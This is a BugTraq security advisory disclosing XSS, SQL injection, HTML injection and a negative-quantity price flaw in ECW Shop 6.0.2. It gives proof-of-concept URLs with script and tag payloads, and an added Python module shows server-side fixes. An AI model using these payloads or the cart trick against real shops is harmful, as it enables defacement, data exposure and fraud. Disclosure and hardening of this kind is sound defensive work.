BugTraq
[NOBYTES.COM: #9] ECW Shop 6.0.2 - Multiple Vulnerabilities
Aug 15 2005 10:29PM
John Cobb (johnc nobytes com)
Hello All,
I have discovered a number of remote vulnerabilities in: ECW Shop 6.0.2
Authors Site: http://www.soft4e.com/
ECW Shop is described by its authors as:
ECW-Shop - simple for use featured shopping cart with ability to use Excel
or Access format for database.
+-[Examples:]--------------------------------------------------+
[1]------------------------------------------------------------+
XSS: (This same problem was reported on version 5.5 by David S. Ferreira -
http://www.securityfocus.com/bid/9244)
http://www.victim.com/index.php?c=srch&ctg=Cat_1&id=754ce025144839c2abe369c36d90d8e9&key=1&comp=1&min=1&max=><script>var%20xss=31337;alert(xss);</script>
[2]------------------------------------------------------------+
Information Disclosure & Possible SQL Injection:
http://www.victim.com/index.php?c=srch&ctg=Cat_1&id=754ce025144839c2abe369c36d90d8e9&key=1&comp=1&min='&max=1
http://www.victim.com/index.php?c=srch&ctg=Cat_1&id=754ce025144839c2abe369c36d90d8e9&key=1&comp=1&min=1&max='
Error:
Warning: mysql_num_rows(): supplied argument is not a valid MySQL result
resource in /var/www/html/search.php on line 109
[3]------------------------------------------------------------+
HTML Injection:
http://www.victim.com/index.php?c=srch&ctg=Cat_1&id=754ce025144839c2abe369c36d90d8e9&key=1&comp=1&min=1&max=><H1>DEFACED!</H1>
http://www.victim.com/index.php?id=754ce025144839c2abe369c36d90d8e9&c=srch&id=754ce025144839c2abe369c36d90d8e9&key=&ctg=<H1>DEFACED!</H1>&comp=&min=1&max=1
[4]------------------------------------------------------------+
Cart/Order Manipulation:
You can add negative quantity value items to your cart to gain credit.
Example:
Add '-1' of an item with a value of £4.99
Add '1' of an item with a value of £6.99
Cart Total: £2.00
+-[Notes:]-----------------------------------------------------+
Vulnerabilities found on: 06/08/2005
Author(s) Informed on: 06/08/2005
Author(s) Response: NONE
Author(s) Fix: NONE
JohnC (at) NoBytes (dot) com [email concealed]
http://www.NoBytes.com
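The four findings above share one root cause: request parameters (min, max, ctg, cart quantity) are trusted as-is, so a quote reaches the SQL layer, markup is reflected into the page, and a negative quantity is multiplied straight into the order total. The following Python module is an added example written for this page, not code from the advisory or from ECW Shop (which is PHP); it shows the server-side checks that close each of the four issues. The catalogue, prices, column names and the parameter names passed to the query builder are constructed assumptions for illustration.

```python
"""Server-side hardening for the four ECW Shop issue classes (added example).

Assumptions (not from the advisory): a two-item catalogue with GBP prices,
an `items` table with `category` and `price` columns, and a DB-API driver
that accepts %s placeholders.
"""
from decimal import Decimal, ROUND_HALF_UP
import html
import re

# Constructed sample catalogue; the £4.99 / £6.99 figures match the advisory's [4].
CATALOGUE = {"widget": Decimal("4.99"), "gadget": Decimal("6.99")}


class CartError(ValueError):
    """Raised when a cart line cannot be priced safely."""


def cart_total_unchecked(lines):
    """Reproduces the logic flaw in [4]: quantity is used unvalidated, so a
    negative quantity subtracts from the total and yields a credit."""
    return sum(CATALOGUE[sku] * qty for sku, qty in lines)


def cart_total_checked(lines, max_qty=99):
    """Hardened version: every quantity must be an int in 1..max_qty and every
    SKU must exist; the total is rounded to pence with Decimal (no float)."""
    total = Decimal("0")
    for sku, qty in lines:
        if sku not in CATALOGUE:
            raise CartError(f"unknown item {sku!r}")
        # bool is a subclass of int, so exclude it explicitly.
        if isinstance(qty, bool) or not isinstance(qty, int):
            raise CartError(f"quantity for {sku!r} must be an integer")
        if qty < 1 or qty > max_qty:
            raise CartError(f"quantity {qty} for {sku!r} must be 1..{max_qty}")
        total += CATALOGUE[sku] * qty
    return total.quantize(Decimal("0.01"), rounding=ROUND_HALF_UP)


def parse_search_params(query):
    """Validate search.php-style parameters as they arrive ([1], [2], [3]).

    `min` and `max` must be short non-negative integers: a quote, a tag or a
    script payload is rejected before it can reach SQL or the page. `ctg` is
    free text that the page reflects, so it is HTML-encoded for output.
    """
    out = {}
    for name in ("min", "max"):
        raw = query.get(name, "")
        if not re.fullmatch(r"\d{1,9}", raw):
            raise ValueError(f"{name} must be a non-negative integer")
        out[name] = int(raw)
    if out["min"] > out["max"]:
        raise ValueError("min must not exceed max")
    out["ctg_html"] = html.escape(query.get("ctg", ""), quote=True)
    return out


def build_search_query(ctg, lo, hi):
    """Return (sql, params) for a parameterised price-range search; the values
    travel separately from the SQL text, which is the fix for [2]. Table and
    column names are assumptions for this example."""
    sql = ("SELECT id, name, price FROM items "
           "WHERE category = %s AND price BETWEEN %s AND %s")
    return sql, (ctg, lo, hi)


def rejects(exc, fn, *args):
    """True if fn(*args) raises exc; used to show the checks firing."""
    try:
        fn(*args)
    except exc:
        return True
    return False


if __name__ == "__main__":
    flawed = [("widget", -1), ("gadget", 1)]      # the [4] scenario
    print("unchecked total:", cart_total_unchecked(flawed))   # 2.00, a credit
    print("checked rejects:", rejects(CartError, cart_total_checked, flawed))
    print(parse_search_params({"min": "1", "max": "10", "ctg": "<H1>DEFACED!</H1>"}))
    print(build_search_query("Cat_1", 1, 10))
```

The integer check on min/max is deliberately stricter than escaping: a numeric parameter has no legitimate reason to contain a quote or angle bracket, so rejecting it outright removes the SQL, XSS and HTML-injection vectors at once, and the parameterised query means even a free-text field such as ctg never alters the SQL structure. Quantity validation belongs on the server at the moment the line is added and again when the order is priced; the `max_qty` ceiling also catches integer-overflow style inputs that a client-side form would never send.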
Copyright 2010, SecurityFocus